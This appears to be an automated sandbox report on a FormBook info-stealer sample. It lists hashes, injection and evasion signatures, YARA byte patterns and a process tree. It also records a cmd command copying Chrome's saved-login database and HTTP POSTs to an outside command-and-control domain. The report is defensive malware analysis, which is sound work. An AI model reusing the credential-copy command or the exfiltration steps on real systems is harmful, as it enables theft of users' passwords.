Analysis Report Ijxlcmh_Signed_.exe

Overview

General Information

Sample Name:Ijxlcmh_Signed_.exe
Analysis ID:299496
MD5:d5dd88f0d5994ec98e07b2fb77e72bc9
SHA1:60d36f37a02d126601b7fde79be4db52a43a6be3
SHA256:6c69a036d1c25c0c3203e2cc14ad23fd386bb69f3344fe78113e1f3f07b98a4c
Tags:exe

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • Ijxlcmh_Signed_.exe (PID: 6252 cmdline: 'C:\Users\user\Desktop\Ijxlcmh_Signed_.exe' MD5: D5DD88F0D5994EC98E07B2FB77E72BC9)
    • ieinstal.exe (PID: 2168 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Ijxldrv.exe (PID: 6976 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe' MD5: D5DD88F0D5994EC98E07B2FB77E72BC9)
          • ieinstal.exe (PID: 2616 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • Ijxldrv.exe (PID: 4112 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe' MD5: D5DD88F0D5994EC98E07B2FB77E72BC9)
          • ieinstal.exe (PID: 6232 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • autofmt.exe (PID: 6680 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • NETSTAT.EXE (PID: 6692 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 6776 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • msiexec.exe (PID: 6448 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
        • msiexec.exe (PID: 1000 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\lxjI.url | Methodology_Shortcut_HotKey | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x9b:$hotkey: \x0AHotKey=1
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\lxjI.url | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\lxjI.url | Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x70:$icon: IconFile=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x88e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x956a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17409:$sqlite3step: 68 34 1C 7B E1
  • 0x1751c:$sqlite3step: 68 34 1C 7B E1
  • 0x17438:$sqlite3text: 68 38 2A 90 C5
  • 0x1755d:$sqlite3text: 68 38 2A 90 C5
  • 0x1744b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17573:$sqlite3blob: 68 53 D8 7F 8C
00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
2.2.ieinstal.exe.10410000.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.ieinstal.exe.10410000.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.ieinstal.exe.10410000.3.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
18.2.ieinstal.exe.10410000.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
18.2.ieinstal.exe.10410000.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Steal Google chrome login data
Source: Process started | Author: Joe Security | Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\NETSTAT.EXE, ParentImage: C:\Windows\SysWOW64\NETSTAT.EXE, ParentProcessId: 6692, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 6776

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | ReversingLabs: Detection: 25%
Multi AV Scanner detection for submitted file
Source: Ijxlcmh_Signed_.exe | Virustotal: Detection: 25%
Source: Ijxlcmh_Signed_.exe | ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match | File source: 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.347301102.0000000010411000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.489865505.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.399200553.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.255722131.0000000010411000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.254037466.0000000003E50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.490058063.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.367185514.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.488550629.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.401382635.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.347219785.0000000003E40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.333441854.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.352439392.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.372602980.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.399815412.00000000049D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.324932466.0000000003D3C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.333947953.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.366016750.0000000003060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.400259752.0000000000A30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.254839755.0000000003F16000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.324842296.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.347253674.0000000003E7C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Ijxlcmh_Signed_.exe.10410000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
Source: 7.2.Ijxldrv.exe.10410000.7.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.2.Ijxldrv.exe.10410000.7.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.2.ieinstal.exe.10410000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.ieinstal.exe.10410000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.Ijxlcmh_Signed_.exe.10410000.7.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.2.ieinstal.exe.10410000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe | Code function: 4x nop then mov eax, dword ptr [0040C7CCh] | 0_3_02243B34
Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe | Code function: 4x nop then or edx, 00000200h | 0_3_02238308
Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe | Code function: 4x nop then or edx, 00000200h | 0_3_02243928
Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe | Code function: 4x nop then or edx, 00000200h | 0_3_02243935
Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe | Code function: 4x nop then push 00000000h | 0_3_02238690
Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe | Code function: 4x nop then push 00000000h | 0_3_02238698
Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe | Code function: 4x nop then mov eax, dword ptr [0040C7CCh] | 0_3_02238514
Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe | Code function: 4x nop then push 00000000h | 0_3_02243D9C
Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe | Code function: 4x nop then push 00000000h | 0_3_0222B340
Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe | Code function: 4x nop then push 00000000h | 0_3_0222B348
Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe | Code function: 4x nop then mov eax, dword ptr [0040C7CCh] | 0_3_0222B1C4
Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe | Code function: 4x nop then or edx, 00000200h | 0_3_0222AFB8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then mov eax, dword ptr [0040C7CCh] | 7_3_02223B34
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then or edx, 00000200h | 7_3_02218308
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then or edx, 00000200h | 7_3_02223928
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then or edx, 00000200h | 7_3_02223935
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then push 00000000h | 7_3_02218690
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then push 00000000h | 7_3_02218698
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then mov eax, dword ptr [0040C7CCh] | 7_3_02218514
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then push 00000000h | 7_3_02223D9C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then push 00000000h | 7_3_0220B340
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then push 00000000h | 7_3_0220B348
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then mov eax, dword ptr [0040C7CCh] | 7_3_0220B1C4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then or edx, 00000200h | 7_3_0220AFB8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then mov eax, dword ptr [0040C7CCh] | 12_3_02693B34
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then or edx, 00000200h | 12_3_02688308
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then or edx, 00000200h | 12_3_02693928
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then or edx, 00000200h | 12_3_02693935
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then push 00000000h | 12_3_02688698
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then push 00000000h | 12_3_02688690
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then mov eax, dword ptr [0040C7CCh] | 12_3_02688514
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then push 00000000h | 12_3_02693D9C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then push 00000000h | 12_3_0267B340
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then push 00000000h | 12_3_0267B348
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then mov eax, dword ptr [0040C7CCh] | 12_3_0267B1C4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe | Code function: 4x nop then or edx, 00000200h | 12_3_0267AFB8

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49755
Uses netstat to query active network connections and open ports
Source: unknown | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: global traffic | HTTP traffic detected: GET /oav/?k0GdCl1=OGiTtEl8oZpE8Sv3fxvazbyjtykFcfSLP9Tv9n1IDimktFHXuVh+PBX3cY6ZEpQG1B1V&tZU4=NX1pk HTTP/1.1 | Host: www.mybabyshop4you.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 162.159.130.233
Source: Joe Sandbox View | IP Address: 34.102.136.180
Source: Joe Sandbox View | ASN Name: GOOGLEUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: POST /oav/ HTTP/1.1 | Host: www.mybabyshop4you.com | Connection: close | Content-Length: 717 | Cache-Control: no-cache | Origin: http://www.mybabyshop4you.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.mybabyshop4you.com/oav/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /oav/ HTTP/1.1 | Host: www.mybabyshop4you.com | Connection: close | Content-Length: 169817 | Cache-Control: no-cache | Origin: http://www.mybabyshop4you.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.mybabyshop4you.com/oav/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: GET /oav/?k0GdCl1=OGiTtEl8oZpE8Sv3fxvazbyjtykFcfSLP9Tv9n1IDimktFHXuVh+PBX3cY6ZEpQG1B1V&tZU4=NX1pk HTTP/1.1 | Host: www.mybabyshop4you.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown | DNS traffic detected: queries for: cdn.discordapp.com
Source: unknown | HTTP traffic detected: POST /oav/ HTTP/1.1 | Host: www.mybabyshop4you.com | Connection: close | Content-Length: 717 | Cache-Control: no-cache | Origin: http://www.mybabyshop4you.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.mybabyshop4you.com/oav/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
          Source: Ijxlcmh_Signed_.exe | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
          Source: Ijxlcmh_Signed_.exe | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
          Source: explorer.exe, 00000004.00000000.324899208.0000000008907000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: Ijxlcmh_Signed_.exe | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
          Source: Ijxlcmh_Signed_.exe | String found in binary or memory: http://ocsp.comodoca.com0
          Source: Ijxlcmh_Signed_.exe | String found in binary or memory: http://ocsp.thawte.com0
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icog
          Source: Ijxlcmh_Signed_.exe | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
          Source: Ijxlcmh_Signed_.exe | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
          Source: Ijxlcmh_Signed_.exe | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehpLMEM
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp | String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp | String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp | String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpZ3
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp | String found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp | String found in binary or memory: http://www.msn.com/ocid=iehpK;
          Source: NETSTAT.EXE, 00000011.00000002.496313834.0000000003439000.00000004.00000001.sdmp | String found in binary or memory: http://www.mybabyshop4you.com
          Source: NETSTAT.EXE, 00000011.00000002.496313834.0000000003439000.00000004.00000001.sdmp | String found in binary or memory: http://www.mybabyshop4you.com/oav/
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
